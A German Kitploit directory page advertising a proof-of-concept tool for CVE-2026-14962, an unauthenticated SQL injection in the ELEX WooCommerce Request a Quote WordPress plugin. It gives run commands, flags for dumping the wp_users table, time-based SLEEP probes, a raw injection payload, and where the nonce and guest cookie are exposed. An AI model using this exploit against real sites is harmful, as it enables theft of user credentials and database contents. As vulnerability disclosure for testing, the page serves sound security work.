Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14962 — Wordpress Plugin ELEX WooCommerce Request a Quote unauthentifizierte SQL-Injection | Kitploit
Tools/GitHubGitHub/cflowsec/cve-2026-14962
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubcflowsec/cve-2026-14962

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote unauthentifizierte SQL-Injection

Repository anzeigen
vor 9h 56mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-14962

WordPress-Plugin ELEX WooCommerce Request a Quote nicht authentifizierte SQL-Injection

ELEX WooCommerce Request a Quote (WordPress-Plugin elex-request-a-quote) ≤ 2.4.0 — nicht authentifizierte SQL-Injection über die öffentliche AJAX-Aktion elex_raq_add_to_quote.

Nur für autorisierte Tests. Nicht gegen Systeme ausführen, die Sie nicht besitzen oder für die Sie keine Testgenehmigung haben.

Voraussetzungen: Python 3, nur Standardbibliothek. Das Ziel muss WooCommerce ausführen (die Quote-Skripte/Nonce werden auf der Shop-/Startseite ausgegeben).

root@kitploit:~
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
FlagWas es bewirkt
-u / --urlWordPress-Website-Root (erforderlich). http:// oder https://; ein Hostname wird zuerst als HTTPS versucht, dann als HTTP. Bei selbstsigniertem TLS wird automatisch erneut versucht. --insecure überspringt die Verifizierung von Anfang an
--testGast: Plugin-Version + öffentliche Nonce, dann eine nicht-destruktive $0-SQL-Sonde
--dumpErste wp_users-Zeile + DB-Benutzer. Benötigt WP_DEBUG, damit der XPATH-Fehler im HTTP-Body steht
--query SQLEigener SQL-Ausdruck (keine einfachen Anführungszeichen; 0x…-Hex für Strings verwenden)
--sql EXPRRohes data[id] nach dem $0$0-Ausbruch (Sie schreiben das ) OR … #-Gadget)
--sleep NZeitbasierter SLEEP(N)-Versuch
--pid / --vidWooCommerce-Produkt-/Variations-IDs (Variation muss nicht leer sein, um die Senke zu erreichen)
--insecureTLS-Verifizierung überspringen
--timeoutHTTP-Timeout in Sekunden (Standard 30)

Nicht authentifiziert. Die Nonce wird in request_a_quote_ajax_obj auf / und /shop/ ausgegeben. Das Gast-Cookie ist request_a_quote_user_coockie (die Schreibweise des Plugins).

--test sendet attribute_value=$0. Das verwundbare 2.4.0 preg_replace behandelt $0 als den %s-Treffer und hinterlässt ein literales %d in der Abfrage. 2.4.1 bindet JSON_CONTAINS und $0 ist nur ein JSON-Wert.

Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP.

CVE: CVE-2026-14962. Plugin-Changelog 2.4.1.

Funktionierender PoC

Tool herunterladen